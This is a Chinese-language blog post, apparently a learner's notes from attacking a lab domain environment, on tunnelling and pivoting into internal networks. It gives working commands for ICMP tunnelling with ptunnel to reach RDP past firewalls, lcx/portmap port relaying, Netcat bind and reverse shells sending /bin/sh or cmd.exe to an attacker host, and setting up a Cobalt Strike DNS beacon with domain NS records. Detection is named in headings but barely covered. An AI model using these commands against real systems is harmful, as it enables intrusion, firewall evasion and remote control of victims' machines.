这篇文章上次修改于 185 天前,可能其部分内容已经发生变化,如有疑问可询问作者。

网络层 ICMP 隧道 ptunnel 使用-检测,利用

ptunnel 是把 tcp/udp/sock5 流量伪装成 icmp 流量进行转发的工具
就是说有一些防火墙禁止了某些协议通过,那么我们就可以通过这种伪装的方式来传输数据
下面的例子是打内网主机的时候,内网主机的防火墙过滤了某些协议
QQ截图20211112151254.jpg
然后我们用这种方式来伪装
-p 表示连接 icmp 隧道另一端的机器 IP(即目标服务器)
-lp 表示需要监听的本地 tcp 端口
-da 指定需要转发的机器的 IP(即目标内网某一机器的内网 IP)
-dp 指定需要转发的机器的端口(即目标内网某一机器的内网端口)
-x 设置连接的密码
对方可上外网的主机:./ptunnel -x yingse
kali: ./ptunnel -p 对方可上外网的主机的IP -lp 1080 -da 对方内网主机的IP -dp 3389 -x yingse
转发的3389请求数据给本地 1080
kali:rdesktop 127.0.0.1 1080
原理就是用对方可上外网的主机的身份去请求内网主机的3389端口
我的理解是,在webserver上配置一个服务,然后kali去连接这个服务,在这个服务上做一些操作,也类似代理了吧
不过的话我没弹出rdesktop桌面,但是我看到数据传输了,可能是因为内存不够吧,,,太卡了

第一次拿下域靶场,记录下
QQ截图20211112193137.jpg

传输层转发隧道 lcx和portmap 使用-检测,利用

windows: lcx
linux:portmap(链接https://blog.csdn.net/LTtiandd/article/details/102903725)
感觉linux的有点鸡肋啊,不过还是复现一下吧。链接上的有错,kali上应该是./portmap -m 3 -h1 106.52.54.46 -p1 6666 -h2 127.0.0.1 -p2 22才对
最远端被攻击机:lcx -slave 中继IP 3131 127.0.0.1 3389 “”“”“”“ 将本地 3389 给中继IP 的 3131
中间的机器(就是接水管):lcx -listen 3131 3333 监听 3131 转发至 3333
kali上的话就rdesktop 最靠近的中间的机器ip 3333 然后就是连接最远端被攻击机的3389端口了

其实就类似于接水管,不过这个的话要求全部的靶机都要在掌控之中,上面这个ptunnel的话就3389那个就不需要最远端被攻击机受控制,因为它们的原理不一样,这个lcx的话是端口转发,而ptunnel是用中间的机器去请求

传输层转发隧道 Netcat 使用-检测,利用,功能

最好要确保我们使用的nc要是最新版本的,如果对方机器的nc太老,那就上传个过去,因为版本太老的话-e参数用不了
1.双向连接反弹 shell
正向:攻击连接受害
受害:
nc -ldp 1234 -e /bin/sh 在linux下
nc -ldp 1234 -e c:\windows\system32\cmd.exe 在windows下

攻击:nc 192.168.76.132 1234
反向:受害连接攻击
攻击:nc -lvp 1234
受害:nc 攻击主机 IP 1234 -e /bin/sh
nc 攻击主机 IP 1234 -e c:\windows\system32\cmd.exe

配合lcx

反向代理(就是把cmd给发送到其他的IP):
发送cmd给别人:nc 中继IP 2222 -e c:\windows\system32\cmd.exe
中继IP上接水管:Lcx.exe -listen 2222 3333
kali 或本机:nc -v 192.168.76.143 3333

nc可以将端口给送出去,lcx也可以:lcx -slave 中继IP 3131 127.0.0.1 3389 就是将3389给送出去到中继IP的3131
3.相关 netcat 主要功能测试
指纹服务:nc -nv 192.168.76.143
端口扫描:nc -v -z 192.168.76.143 1-100
端口监听:nc -lvp xxxx
文件传输:

步骤1,先在B机器上启动一个接收文件的监听,格式如下

意思是把在10086端口接收到的数据都写到file文件里(这里文件名随意取)

nc -l port >file

栗子:nc -l -p 10086 >zabbix.rpm

步骤2,在A机器上往B机器的10086端口发送数据,把下面rpm包发送过去

nc 192.168.0.2 10086 < zabbix.rpm(不要在kali下使用nc命令,要上传一个nc文件,然后再敲左边的命令。因为https://blog.csdn.net/jahnsonxi/article/details/95910690)

B机器接收完毕,它会自动退出监听,文件大小和A机器一样,md5值也一样

反弹 Shell:见上

应用层 DNS 隧道配合 CS 上线-检测,利用,说明

当常见协议监听器被拦截时,可以换其他协议上线,其中 dns 协议上线基本通杀
QQ截图20211113000416.jpg
1.云主机 Teamserver 配置端口 53 启用-udp
2.买一个域名修改解析记录如下:
A 记录->cs 主机名->CS 服务器 IP
NS 记录->ns1 主机名->上个 A 记录地址
NS 记录->ns2 主机名->上个 A 记录地址
QQ截图20211113010028.jpg
3.配置 DNS 监听器内容如下:
ns1.ysblog99.com
ns2.ysblog99.com
cs.ysblog99.com
4.生成后门执行上线后启用命令:
beacon> checkin
[*] Tasked beacon to checkin
beacon> mode dns-txt
QQ截图20211113011411.jpg
QQ截图20211113012628.jpg
但是好慢啊,好久了才上线